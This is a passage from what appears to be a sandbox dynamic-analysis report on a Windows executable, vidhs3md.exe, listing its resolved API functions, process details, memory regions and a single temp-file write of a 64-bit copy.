1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x74731580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x74731500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74731560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:37 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #156: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #156 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:05:00, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x544 |
| Parent PID | 0xeac (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
908
0x
938
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00580000 | 0x005a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x01d7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74550000 | 0x745e1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x74730000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
